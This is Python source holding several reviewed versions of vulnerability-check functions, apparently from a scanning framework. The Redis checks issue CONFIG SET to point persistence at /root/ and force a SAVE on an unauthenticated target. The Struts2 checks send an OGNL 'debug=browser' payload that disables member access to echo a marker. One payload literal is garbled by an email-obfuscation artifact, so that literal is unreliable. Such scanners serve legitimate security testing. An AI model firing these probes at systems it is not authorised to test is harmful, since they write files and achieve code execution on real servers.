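def poc(url):
    """Check a Redis instance for unauthenticated access with a writable,
    CONFIG-settable persistence path.

    Args:
        url: "host" or "host:port" (resolved through host2IP); port defaults
            to 6379 when absent.

    Returns:
        The web URL found on the same host (via redirectURL, or "ip:port" when
        redirectURL fails) when every check passes; False when no web port is
        open, INFO is refused, or any Redis step raises.

    Side effects on the target: SET/DEL of a random key and a SAVE into
    /root/dump.rdb. The 'dir'/'dbfilename' settings are restored afterwards,
    but the written dump file itself is not removed.
    """
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379
    # Look for a web service on the same host; only the first open port is used.
    for web_port in [80, 443, 8080, 8443]:
        if checkPortTcp(ip, web_port):
            try:
                real_url = redirectURL(ip + ':' + str(web_port))
            except Exception:
                real_url = ip + ':' + str(web_port)
            break  # TODO: simplified — only one port's result is reported
    else:
        return False
    try:
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
        # INFO answering without AUTH means no password is required.
        if 'redis_version' not in r.info():
            return False
    except Exception:
        return False
    saved_config = {}
    try:
        # Remember the current persistence settings so they can be put back;
        # the original left the target pointed at /root/ permanently.
        saved_config.update(r.config_get('dir'))
        saved_config.update(r.config_get('dbfilename'))
        key = randomString(5)
        value = randomString(5)
        r.set(key, value)  # writable?
        r.config_set('dir', '/root/')  # CONFIG SET allowed? (root-writable dir assumed; TODO /var/www)
        r.config_set('dbfilename', 'dump.rdb')
        r.delete(key)
        r.save()  # can the dataset be exported to disk?
    except Exception:
        return False
    finally:
        # Best-effort restore; a failure here must not mask the result.
        for name in ('dir', 'dbfilename'):
            if name in saved_config:
                try:
                    r.config_set(name, saved_config[name])
                except Exception:
                    pass
    # NOTE(review): real_url was computed but never returned in the original,
    # so the vulnerable path yielded None; returning it is the evident intent.
    return real_url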
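def _restore_redis_config(r, saved_config):
    """Best-effort restore of the CONFIG values captured before the test."""
    for name in ("dir", "dbfilename"):
        if name in saved_config:
            try:
                r.config_set(name, saved_config[name])
            except Exception:
                pass


def poc(url):
    """Detect an unauthenticated Redis instance whose persistence settings
    can be changed through CONFIG SET.

    Args:
        url: "host" or "host:port" (resolved via host2IP); defaults to 6379.

    Returns:
        The host's web URL (redirectURL result, or "ip:port" on failure)
        when all checks pass; False when no web port answers, INFO is
        refused, or any Redis operation raises.

    Side effects on the target: SET/DEL of a random key and a SAVE to
    /root/dump.rdb. 'dir' and 'dbfilename' are restored afterwards; the
    dump file is not removed.
    """
    url = host2IP(url)
    ip = url.split(":")[0]
    port = int(url.split(":")[-1]) if ":" in url else 6379
    # Find a web service on the host; the first open port wins.
    for web_port in [80, 443, 8080, 8443]:
        if checkPortTcp(ip, web_port):
            try:
                real_url = redirectURL(ip + ":" + str(web_port))
            except Exception:
                real_url = ip + ":" + str(web_port)
            break  # TODO: simplified — only one port's result is reported
    else:
        return False
    try:
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
        # INFO without AUTH succeeding means no password is configured.
        if "redis_version" not in r.info():
            return False
    except Exception:
        return False
    saved_config = {}
    try:
        # Capture current values so the target is not left pointed at /root/.
        saved_config.update(r.config_get("dir"))
        saved_config.update(r.config_get("dbfilename"))
        key = randomString(5)
        value = randomString(5)
        r.set(key, value)  # writable?
        r.config_set("dir", "/root/")  # CONFIG SET permitted? (root-writable dir assumed; TODO /var/www)
        r.config_set("dbfilename", "dump.rdb")
        r.delete(key)
        r.save()  # dataset exportable to disk?
    except Exception:
        return False
    finally:
        _restore_redis_config(r, saved_config)
    # NOTE(review): the original never returned real_url (fell off the end,
    # yielding None on the vulnerable path); returning it is the evident intent.
    return real_url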
def poc(url):
    """Normalise *url* and resolve it through redirectURL unless it already
    names an ``.action`` endpoint.

    Returns False when redirectURL raises; otherwise None (no result is
    produced beyond the normalisation).
    """
    target = url if '://' in url else 'http://' + url
    # Drop any query string before inspecting the path.
    target = target.partition('?')[0]
    if '.action' in target:
        return None
    try:
        target = redirectURL(target)
    except Exception:
        return False
    return None
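def poc(url):
    """Probe a Struts2 endpoint via the ``debug=browser`` OGNL payload.

    Args:
        url: target URL; "http://" is prepended when no scheme is given and
            any query string is dropped. Non-``.action`` URLs are resolved
            through redirectURL first.

    Returns:
        The resolved URL when the random marker is echoed back without the
        payload itself being reflected; False when redirectURL or the HTTP
        request raises; None otherwise.
    """
    if '://' not in url:
        url = 'http://' + url
    if '?' in url:
        url = url.split('?')[0]
    key = randomString()
    # NOTE(review): "%[email protected]" looks like a scraper's email-obfuscation
    # artifact, not valid OGNL; verify this literal against the upstream payload.
    payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
    try:
        # redirectURL was outside the try in the original, so its failures
        # escaped to the caller instead of returning False like the request's.
        if '.action' not in url:
            url = redirectURL(url)
        target = url + payload
        c = requests.get(target, headers={'User-Agent': firefox()}, timeout=5).content
        # The marker alone is not enough: a page that reflects the query
        # string would also contain it, so require that the payload is absent.
        if key in c and 'xwork2.dispatcher' not in c:
            return url
    except Exception:
        return False
    return None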
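def poc(url):
    """Probe a Struts2 endpoint via the ``debug=browser`` OGNL payload.

    Args:
        url: target URL; "http://" is prepended when no scheme is given and
            any query string is dropped. Non-``.action`` URLs are resolved
            through redirectURL first.

    Returns:
        The resolved URL when the random marker is echoed back without the
        payload itself being reflected; None otherwise (failures are logged
        at debug level).
    """
    if '://' not in url:
        url = 'http://' + url
    if '?' in url:
        url = url.split('?')[0]
    key = randomString()
    # NOTE(review): "%[email protected]" looks like a scraper's email-obfuscation
    # artifact, not valid OGNL; verify this literal against the upstream payload.
    payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
    try:
        # redirectURL was outside the try in the original, so its failures
        # escaped to the caller instead of being logged like the request's.
        if '.action' not in url:
            url = redirectURL(url)
        target = url + payload
        c = requests.get(target, headers={
            'User-Agent': firefox()
        }, timeout=5).content
        # Require the payload to be absent so a page that merely reflects
        # the query string is not reported as vulnerable.
        if key in c and 'xwork2.dispatcher' not in c:
            return url
    except Exception as e:
        logging.debug(e)
    return None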